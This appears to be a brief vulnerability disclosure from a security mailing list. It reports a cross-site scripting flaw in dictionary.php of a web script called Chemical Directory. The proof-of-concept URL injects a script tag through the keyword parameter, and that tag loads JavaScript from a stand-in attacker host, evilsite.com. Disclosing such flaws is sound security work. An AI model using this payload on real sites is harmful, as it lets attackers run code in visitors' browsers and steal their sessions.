<<< Date Index >>>     <<< Thread Index >>>

Chemical Directory - XSS



Chemical Directory v.unknown (doesnt say on website) 

Homepage:
http://www.scriptsez.net/ 

Effected files:
dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT 
SRC=http://evilsite.com/xss.js][/SCRIPT]